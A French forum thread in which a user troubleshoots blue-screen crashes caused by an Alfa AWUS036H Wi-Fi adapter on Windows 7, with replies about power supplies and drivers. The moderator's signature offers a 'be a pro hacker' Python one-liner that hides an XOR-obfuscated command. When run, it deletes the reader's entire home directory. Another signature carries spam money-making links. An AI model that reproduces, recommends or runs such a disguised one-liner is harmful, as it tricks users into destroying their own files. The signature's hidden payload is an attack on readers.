Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-03-2012 15:00:27

Ayioo
N00b
Inscription : 15-03-2012
Messages : 2

Ecran Bleu au branchement de l'alfa 036H

Bonjours,

Je me présente déja, je ne suis pas vraiment un utilisateur de forum, en general lorsque j'ai un probleme je recherche sur google et je tombe generalement sur des cas similaire au mient, et aussi car je sais que je risque probablement de ne pas m'impliquer d'avantage et que je trouve assez nul de venir demander de l'aide et ensuite ne pas aider en retour.

Mais sur ce coup je sais vraiment pas quoi faire sad alors si des âmes charitable pouvais m'aider !

Système d'exploitation : Windows Seven familial premium

Alors j'explique mon problème :

J'ai acheter une alfa 036h, donc jusque-la heureux, elle est toute belle en plus mais après installation des driver pour Windows7 téléchargé sur le site officiel pour être sur d'avoir les plus récent, j'ai des écran bleu qui ce répète sans arrêt lorsque la carte est branché, je vais édit mon post avec des détail sur le message de cette écran bleu, je doit le lire en plusieurs fois car il ne s'affiche pas longtemps.

J'ai tout de même eu le temps de lire des mots comme : driver, update, bios il me semble mais je vais re-regarder.

Mais sinon c'est vraiment lorsque la carte est branché au pc que l'ordi plante, même si je l'allume sans la carte et que par la suite je la branche, après moins d'une seconde, et jamais plus, l'ordie plante encore.

Si j'allume le pc avec la carte branché, arrivé après le chargement avec le logo Windows l'ordie plante.

Par contre en mode sans échec avec prise en charge réseau, sa marche normalement, c'est d’ailleurs pour sa que j'arrive à vous écrire.

J'ai pu voir beaucoup de problème relatif a cette carte et Windows7 mais aucun comparable au mien.

Cela a même provoqué pendant un temps un écran noir au démarrage de Windows, même si j'avais désinstallé tout les driver et débranché la carte. J'ai pu résoudre ce problème en désactivant le contrôle des compte.

Mais la encore j'ai du mal à saisir le rapport entre cette écran noir provoqué par l'installation de ma carte, et le fait que j'ai pu régler sa avec le contrôle des comptes ><

J’espère que quelqu’un pourra m'aider !

Edit : J'ai bien tenter de lire le message mais rien a faire, il ne s'affiche que quelque seconde, et comme je suis mauvais en anglais.. A part me souvenir des mots que je connais, je ne comprend pas.

Et j'ai réussi a faire marcher la clé-wifi, je vient de remarqué quelle ne plante pas lorsque ma carte réseau intégré reste activé, j’espère que sa na pas d'incidence sur la qualité de réception.

Je laisse mon post au cas ou quelqu’un saurais quelle est le problème.

Dernière modification par Ayioo (15-03-2012 15:33:56)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-03-2012 20:47:05

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Ecran Bleu au branchement de l'alfa 036H

Quand tu dis 'carte', tu parle d'une carte interne ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 16-03-2012 11:51:08

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Ecran Bleu au branchement de l'alfa 036H

Il est possible que ton alimentation sois à genou ce qui arrive bien souvent avec les pc de supermarché ou autre apres quelques rajout de composant. Je n'exclue pas non plus le pilote/hardware defaillant.


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#4 16-03-2012 14:22:55

Ayioo
N00b
Inscription : 15-03-2012
Messages : 2

Re : Ecran Bleu au branchement de l'alfa 036H

Merci de vos réponse !

Par carte je veux dire l'afla, et sinon mon pc et un asus X53S acheté sur un site internet, mais j'ai trouvé le moyen pour que l'alfa marche, il faut obligatoirement que ma carte réseau interne qui est une Intel Centrino Wireless-N 100 soit activer, si je la désactive ne serais ce que pour faire une réparation, l'ordie plante instantanément.

Enfin sa reste tout de même gênant, je ne peu pas utiliser le logiciel pour le réseau qui va avec l'alfa et du moins je pense que le fais d'avoir les deux carte activer créer de l'instabilité avec le signal wifi.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 67 02-12-2016 16:57:55 par disquette
0 313 26-10-2016 19:06:01 par Christophe93
8 494 19-10-2016 14:43:06 par kcdtv
Ecran qui clignote par Achtenebros
6 327 14-10-2016 21:25:05 par trachnar
16 985 27-09-2016 20:28:09 par koala

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]